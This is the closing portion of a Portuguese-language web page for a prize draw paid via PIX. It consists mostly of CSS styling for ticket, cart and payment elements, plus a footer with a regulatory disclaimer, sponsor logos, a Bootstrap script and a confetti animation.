    margin-top: 10px !important;
    font-size: 1.8rem !important;
    color: #2f4eb5 !important;
    font-weight: 500 !important;
}

.infos-banner h3 {
    margin-top: 30px !important;
    font-size: 1rem !important;
    color: rgb(100 116 139) !important;
    font-weight: 400 !important;
}

.topo {
    background-color: #2f4eb5 !important;
    padding: 1rem !important;
    margin-bottom: 1.2rem !important;
}

.topo img {
    width: 150px !important;
    max-width: 50% !important;
}

.base-cupom {
    padding: 1rem 0rem;
    background-color: white;
}

.coupon {
    height: 190px;
    background-color: #2f4eb5;
}

.coupon .kanan {
    border-left: 1px dashed #ddd;
    width: 40% !important;
    position:relative;
}

.coupon .kanan .info::after, .coupon .kanan .info::before {
    content: '';
    position: absolute;
    width: 20px;
    height: 20px;
    background: #ffffff;
    border-radius: 100%;
}
.coupon .kanan .info::before {
    top: -10px;
    left: -10px;
}

.coupon .kanan .info::after {
    bottom: -10px;
    left: -10px;
}
.coupon .time {
    font-size: 1.6rem;
}

H1.voce-achou {
    margin-top: 20px;
    color: #2f4eb5;
    font-size: 2.2rem;
    font-weight: 800;
    text-align: center;
}

span.numero-bilhete {
    margin-top: 5px;
    display: flex;
    justify-content: center;
    padding: 0.5rem;
    color: #fff;
    font-size: 1.2rem;
    font-weight: 800;
    line-height: 1.1em;
    border: 1px dashed #ddd;
}

.icon-bilhete i {
    color: white;
    font-size: 3rem !important;
}

span.bilhete-premiado {
    color: #fff;
    font-size: 1.4rem;
    font-weight: 800;
    line-height: 1.1em;
}


span.valor-premio {
    margin-top: 20px;
    text-align: center;
    color: #fff;
    font-size: 0.9rem;
    font-weight: 500;
    line-height: 1.1em;
}

span.valor-premio-dinheiro {
    text-align: center;
    color: #fff;
    font-size: 1.8rem;
    font-weight: 800;
    line-height: 1.1em;
}

H1.assista-video {
    margin-top: 20px;
    color: #2f4eb5;
    font-size: 1.4rem;
    line-height: 1em;
    font-weight: 800;
    text-align: center;
}


H1.assista-video-novo {
    margin-top: 30px;
    color: #2f4eb5;
    font-size: 1.4rem;
    line-height: 1em;
    font-weight: 800;
    text-align: center;
}


@media (max-width: 575.98px) {

    .icon-bilhete i {
        color: white;
        font-size: 1.3rem !important;
    }

    .infos-banner h1 {
        margin-top: 20px !important;
        font-size: 4.2vw;
        font-weight: 600;
    }
    
    .infos-banner h2 {
        margin-top: 10px !important;
        font-size: 7vw;
        color: #2f4eb5;
        font-weight: 500;
    }
    
    .infos-banner h3 {
        margin-top: 15px !important;
        font-size: 4vw;
        color: rgb(100 116 139);
        font-weight: 500;
    }


    .infos-sorteio h1 {
        margin: 0rem 0.5rem !important;
        color: white;
        font-size: 0.8rem;
    }

    .infos-sorteio span {
        font-size: 0.9rem;
        padding: 0.3rem;
    }

    .cotas {
      	margin-top: -10px !important;
        padding: 0rem 0rem;
    }

    .cotas h3 {
	    margin-top: 30px !important;
        font-size: 0.9rem;
    }

    .cotas-one {
        margin-top: 1rem !important;
    }

    button.cota {
        width: 30%;
        padding: 1.5rem 0rem;
        border: solid rgba(128, 128, 128, 0.137) 2px;
    }

    .cota-qtd {
        font-size: 1.3rem;
    }

    .cota h1 {
        font-size: 0.9rem;
    }

    .cota h2 {
        font-size: 0.7rem;
        font-weight: 500;
    }

    i.destaque {
        font-size: 0.7rem !important;
        padding: 0.2rem 0.5rem;
        border-radius: 0.4rem;
    }

    .contador-cotas {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 100% !important;
        padding: 0.8rem 0.3rem;
    }

    button.btn-contador-cotas {
        margin-top: 0.2rem !important;
        height: 30px;
        width: 30px;
        font-size: 1.5rem;
        padding: 0.5rem 0rem;
    }

    input.input-contador-cotas {
        width: 65% !important;
        margin: 0rem 0.5rem !important;
        padding: 0.5rem 1.2rem;
    }

    button.adc-carrinho {
        line-height: 1em;
        font-size: 1.2rem;
        padding: 0.8rem 0rem;
        margin-top: 10px !important;
    }

    button.adc-carrinho i {
        font-size: 1.5rem;
    }

    .resumo-compra {
        margin-top: 20px !important;
    }

    .resumo-compra-header {
        width: 100%;
    }

    .resumo-compra-header-text {
        gap: 0px;
        width: 20%;
        color: white;
    }

    .resumo-compra-header-text h1 {
        margin-top: 5px;
        margin-bottom: 2px !important;
        font-size: 0.7em;
        font-weight: 600;
        line-height: 1;
    }

    .resumo-compra-header-text h2 {
        font-size: 0.6rem;
        line-height: 1;
    }

    .resumo-compra-header-valor {
        width: 45%;
        font-size: 1.0rem;
        padding: 0.5rem 1rem;
        margin: 0rem 2rem 0rem 2rem !important;
        border-radius: 0.32rem;
    }

    .resumo-compra-header-btn {
        width: 10%;
    }

    .resumo-compra-header-btn span {
        padding: 0.3rem;
        line-height: 0;
        font-size: 1rem;
        width: 25px !important;
        height: 25px !important;
        border-radius: 50%;
    }

    .resumo-compra-table {
        padding: 0.5rem 0rem 0rem 0rem;
        border-bottom: #d1d1d1 1px solid;
    }

    .resumo-compra-table h1 {
        margin-top: 5px !important;
        font-size: 0.9rem;
        width: 50%;
    }

    .resumo-compra-table h2 {
        margin-top: 5px !important;
        font-size: 1rem;
        width: 50%;
    }

    .resumo-compra-table.active {
        margin: 0.5rem 0rem !important;
        background-color: #2f4eb5;
        color: white !important;
        border-radius: 0.6rem;
        padding: 0.7rem 1rem;
        border-bottom: #d1d1d1 1px solid;
    }

    .resumo-compra-table.active h1 {
        color: white !important;
    }

    .resumo-compra-table.active h2 {
        color: white !important;
    }


    input.dados-form-input {
        color: black;
        font-size: 1.1rem;
        border-radius: 0.375rem;
        background-color: white;
        border: 2px solid rgb(224, 224, 224);
        width: 100%;
        padding: 1rem;
        margin: 0.5rem 0rem !important;
    }

    input.dados-form-input:focus {
        background-color: #f8fafc;
        border: 2px solid rgb(224, 224, 224);
    }

    .dados-form {
        padding: 2rem 1rem;
    }
    

    .area-pgto {
        font-size: 0.9rem !important;
        flex-direction: column;
    }
    
    .qr-code-img {
        width: 50% !important;
        padding: 0rem;
        margin-bottom: -20px;
    }

    .qr-code-img-novo {
        width: 100% !important;
        padding: 0rem;
        margin-bottom: -20px;
    }

    .qr-code-img-novo img {
        width: 50% !important;
        margin-bottom: 20px !important;
    }
    
    #codigo-pix-container h1 {
        color: #6B7280;
        font-size: 1rem;
    }
    
    .pix-code {
        width: 100%;
        padding: 0rem;
    }
    
    #codigo-pix {
        width: 100%;
        overflow: hidden;
        color: black !important;
        background-color: #f1f5f9;
        color: #a0a3b8 !important;
        padding: 1rem;
    }
    
    IMG.img-pix {
        border-radius: 0.5rem;
        margin-top: 0px;
        margin-bottom: 15px;
        width: 180px !important;
        max-width: 50% !important;
    }

    .pix-info {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 30px;
    }
    
    .pix-info img {
        width: 55%;
        margin-right: 0px;
    }
    
    .pix-info h1 {
        margin-top: 20px;
        font-weight: 400;
        font-size: 0.9rem;
        text-align: center;
    }
    
    .como-pagar {
        padding: 3rem 0.5rem;
        font-size: 1.5rem;
        margin-top: 35px !important;
    }
    
    .como-pagar-one {
        padding: 1.5rem 1rem;
        display: flex;
        align-items: center;
        justify-content: start;
    }
    
    .como-pagar-one h1 {
        font-size: 0.9rem;
        font-weight: 400;
    }
    
    .como-pagar-one img {
        width: 40px !important;
        margin-right: 1rem;
    }
    
    

    .patterns-rodape {
        flex-direction: column;
        font-size: 0.8rem;
    }
    
    .pattern-rodape {
        display: flex;
        flex-direction: column;
        margin-bottom: 30px;
    }
    
    .pattern-rodape img {
        width: 65%;
        height: auto;
        margin-top: 10px !important;
    }
    
}

.rodape {
    margin-top: 100px !important;
    padding: 1.5rem 0.5rem;
    background-color: #fafafa;
}

IMG.logo-rodape {
    width: 250px;
    max-width: 40%;
}

.redes {
    margin: 1.5rem 0rem !important;
}

.redes i {
    color: #2f4eb5;
    font-size: 1.2rem;
    margin-right: 0.5rem !important;
}

.rodape h1 {
    font-size: 0.8rem;
    text-align: justify;
}

.linha-rodape {
    margin: 2rem 0rem !important;
    border-bottom: 4px solid #d1d5db;
}

.patterns-rodape {
    display: flex;
    font-size: 0.9rem;
    font-weight: 500;
}

.patterns-rodape {
    width: 100% !important;
    display: flex;
    justify-content: start !important;
    align-items: start !important;
    font-size: 0.7rem;
    font-weight: 500;
}

.pattern-rodape {
    display: flex;
    flex-direction: column;
    margin-bottom: 30px;
    margin-right: 35px !important;
}

.pattern-rodape img {
    width: 60%;
    height: auto;
    margin-top: 10px !important;
}

@media (max-width: 575.98px) {


    .patterns-rodape {
        flex-direction: column;
        font-size: 0.8rem;
    }

    .pattern-rodape {
        display: flex;
        flex-direction: column;
        margin-bottom: 30px;
    }

    .pattern-rodape img {
        width: 65%;
        height: auto;
        margin-top: 10px !important;
    }

}

.topo {
    background-color: #2f4eb5 !important;
    padding: 1rem !important;
    margin-bottom: 1.2rem !important;
}

.topo img {
    width: 150px !important;
    max-width: 50% !important;
}


  </style>
</div>

<head>
    <link href="css/rodape.css@v=1234256" rel="stylesheet">
  </head>
  
  <div class="rodape">
      <div class="container-principal">
          <img class="logo-rodape" src="https://i.postimg.cc/xdy5nZgx/474d82b58cdd846ecb594a3419a5cafcce23244a.png"/>
  
          <div class="redes">
              <i class="bi bi-instagram"></i>
              <i class="bi bi-facebook"></i>
              <i class="bi bi-twitter"></i>
              <i class="bi bi-youtube"></i>
          </div>
  
          <h1>Sorteios lastreados por Títulos de Capitalização, da Modalidade Incentivo, emitidos pela VIA Capitalização S.A, inscrita no CNPJ sob nº 88.076.302/0001-94, e aprovados pela SUSEP através do registro na SUSEP Sorteio n° 15414.652257/2023-51. O valor das premiações aqui indicados são líquidos, já descontado o devido imposto de renda de 25%. O registro deste plano na SUSEP não implica, por parte da Autarquia, incentivo ou recomendação a sua comercialização.</h1>
          
          <div class="linha-rodape"></div>
  
          <div class="patterns-rodape">
              <div class="pattern-rodape">
                  Títulos emitidos por:
                  <img src="https://i.postimg.cc/D0Ddx3yZ/viacap.png"/>
              </div>
  
              <div class="pattern-rodape">
                  Promoção realizada por:
                  <img src="https://i.postimg.cc/fWgKzmjN/viva.png"/>
              </div>
  
              <div class="pattern-rodape">
                  Desenvolvimento:
                  <img src="https://i.postimg.cc/13DcrTxm/edjdigital.png"/>
              </div>
          </div>
      </div>
  </div>
  
  
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4" crossorigin="anonymous"></script>
  
  <script src="js/confetti.min.js"></script>
  <script>
    confetti.start()
  </script>
  <script>
    setTimeout(function () {
      confetti.stop();
    }, 8000)
  </script>
  
  
  </body>
  
  </html>
  
